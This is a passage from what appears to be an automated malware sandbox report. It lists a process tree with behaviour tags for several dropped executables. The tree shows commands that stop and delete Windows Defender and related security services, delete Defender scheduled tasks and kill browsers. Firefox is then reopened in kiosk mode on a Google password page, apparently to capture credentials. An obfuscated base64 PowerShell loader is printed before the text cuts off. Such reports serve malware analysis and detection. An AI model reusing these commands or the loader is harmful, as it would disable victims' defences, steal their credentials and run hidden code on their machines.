                          sc stop "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:1704
                        • C:\Windows\system32\sc.exe
                          sc delete "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:1732
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                          11⤵
                            PID:2760
                          • C:\Windows\system32\sc.exe
                            sc stop "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:1712
                          • C:\Windows\system32\sc.exe
                            sc delete "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:2748
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                            11⤵
                              PID:1896
                            • C:\Windows\system32\sc.exe
                              sc stop "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:1148
                            • C:\Windows\system32\sc.exe
                              sc delete "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:2492
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                              11⤵
                                PID:2900
                              • C:\Windows\system32\sc.exe
                                sc stop "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:2904
                              • C:\Windows\system32\sc.exe
                                sc delete "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:2908
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                11⤵
                                  PID:1504
                                • C:\Windows\system32\sc.exe
                                  sc stop "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2992
                                • C:\Windows\system32\sc.exe
                                  sc delete "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:444
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                  11⤵
                                    PID:668
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:376
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:1128
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                    11⤵
                                      PID:2784
                                    • C:\Windows\system32\sc.exe
                                      sc stop "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:1716
                                    • C:\Windows\system32\sc.exe
                                      sc delete "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:1976
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                      11⤵
                                        PID:1324
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:752
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:892
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                        11⤵
                                          PID:604
                                        • C:\Windows\system32\sc.exe
                                          sc stop "webthreatdefusersvc"
                                          11⤵
                                          • Launches sc.exe
                                          PID:1336
                                        • C:\Windows\system32\sc.exe
                                          sc delete "webthreatdefusersvc"
                                          11⤵
                                          • Launches sc.exe
                                          PID:1544
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                          11⤵
                                            PID:656
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdNisDrv"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2292
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdNisDrv"
                                            11⤵
                                            • Launches sc.exe
                                            PID:2064
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                            11⤵
                                              PID:1040
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdBoot"
                                              11⤵
                                              • Launches sc.exe
                                              PID:2176
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdBoot"
                                              11⤵
                                              • Launches sc.exe
                                              PID:2400
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                              11⤵
                                                PID:1616
                                              • C:\Windows\system32\sc.exe
                                                sc stop "WdFilter"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2196
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdFilter"
                                                11⤵
                                                • Launches sc.exe
                                                PID:1836
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                11⤵
                                                  PID:2060
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "SgrmAgent"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2280
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "SgrmAgent"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2572
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                  11⤵
                                                    PID:1736
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecWfp"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:872
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecWfp"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:2352
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                    11⤵
                                                      PID:836
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecFlt"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:876
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecFlt"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:612
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                      11⤵
                                                        PID:324
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "MsSecCore"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:1588
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "MsSecCore"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:2224
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                        11⤵
                                                          PID:3000
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                          11⤵
                                                            PID:288
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                            11⤵
                                                              PID:2256
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                              11⤵
                                                                PID:2676
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                11⤵
                                                                  PID:2928
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop ddrver
                                                                  11⤵
                                                                  • Launches sc.exe
                                                                  PID:2284
                                                                • C:\Windows\system32\sc.exe
                                                                  sc delete ddrver
                                                                  11⤵
                                                                  • Launches sc.exe
                                                                  PID:2888
                                                      • C:\Users\Admin\AppData\Local\Temp\10367470101\4134bcbcf6.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10367470101\4134bcbcf6.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2760
                                                      • C:\Users\Admin\AppData\Local\Temp\10367480101\3e23f0d1f6.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10367480101\3e23f0d1f6.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2156
                                                      • C:\Users\Admin\AppData\Local\Temp\10367490101\f1b96dde78.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10367490101\f1b96dde78.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1796
                                                      • C:\Users\Admin\AppData\Local\Temp\10367500101\e6701df100.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10367500101\e6701df100.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:984
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM firefox.exe /T
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2348
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM chrome.exe /T
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2444
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM msedge.exe /T
                                                          7⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1616
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM opera.exe /T
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3032
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /F /IM brave.exe /T
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2788
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                          7⤵
                                                            PID:2036
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                              8⤵
                                                              • Checks processor information in registry
                                                              • Modifies registry class
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              PID:1516
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.0.1816794310\43201584" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {683da92c-3cc2-4ffe-8bb5-49b5a52d75c1} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 1292 11dd7858 gpu
                                                                9⤵
                                                                  PID:2608
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.1.347977658\1576669674" -parentBuildID 20221007134813 -prefsHandle 1480 -prefMapHandle 1476 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8c054a6-eee4-4445-8fa4-4246d0e89b17} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 1492 e71b58 socket
                                                                  9⤵
                                                                    PID:2660
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.2.2039676615\1000788790" -childID 1 -isForBrowser -prefsHandle 2180 -prefMapHandle 2176 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7870d6b-80a4-4995-a900-73eff8d88c77} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 2192 198ef558 tab
                                                                    9⤵
                                                                      PID:2404
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.3.607650216\10745090" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {59dde53d-3d37-4baf-ac7b-6bf0880b5ef1} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 2924 e5e458 tab
                                                                      9⤵
                                                                        PID:2804
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.4.442866415\2111758440" -childID 3 -isForBrowser -prefsHandle 3752 -prefMapHandle 3748 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b1fbf13-f8d6-464f-92cc-1fca23fa75f9} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 3764 20bc2d58 tab
                                                                        9⤵
                                                                          PID:3016
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.5.487816481\678762329" -childID 4 -isForBrowser -prefsHandle 3796 -prefMapHandle 3868 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef109c10-5ca6-4e09-9905-9d4ff08d7ca3} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 3968 2144f258 tab
                                                                          9⤵
                                                                            PID:2340
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1516.6.856992852\1954468525" -childID 5 -isForBrowser -prefsHandle 4104 -prefMapHandle 4108 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 832 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {75580f7a-b668-4f87-ac0d-7597682b5ff0} 1516 "\\.\pipe\gecko-crash-server-pipe.1516" 4088 21451958 tab
                                                                            9⤵
                                                                              PID:1564
                                                                      • C:\Users\Admin\AppData\Local\Temp\10367510101\63685cf865.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\10367510101\63685cf865.exe"
                                                                        6⤵
                                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                        • Modifies Windows Defender TamperProtection settings
                                                                        • Modifies Windows Defender notification settings
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Identifies Wine through registry keys
                                                                        • Windows security modification
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3408
                                                                      • C:\Users\Admin\AppData\Local\Temp\10367520101\59ee8e938d.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\10367520101\59ee8e938d.exe"
                                                                        6⤵
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Identifies Wine through registry keys
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Suspicious use of SetThreadContext
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3932
                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10367520101\59ee8e938d.exe"
                                                                          7⤵
                                                                          • Downloads MZ/PE file
                                                                          • Executes dropped EXE
                                                                          PID:3132
                                                                      • C:\Users\Admin\AppData\Local\Temp\10367530101\ecdc428e8a.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\10367530101\ecdc428e8a.exe"
                                                                        6⤵
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Identifies Wine through registry keys
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3760
                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\10367530101\ecdc428e8a.exe"
                                                                          7⤵
                                                                          • Downloads MZ/PE file
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3848
                                                                      • C:\Users\Admin\AppData\Local\Temp\10367540101\42c2c6457d.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\10367540101\42c2c6457d.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:3956
                                                                        • C:\Windows\system32\WerFault.exe
                                                                          C:\Windows\system32\WerFault.exe -u -p 3956 -s 64
                                                                          7⤵
                                                                            PID:3472
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10367551121\2GF9eeb.cmd"
                                                                          6⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3248
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10367551121\2GF9eeb.cmd"
                                                                            7⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3168
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4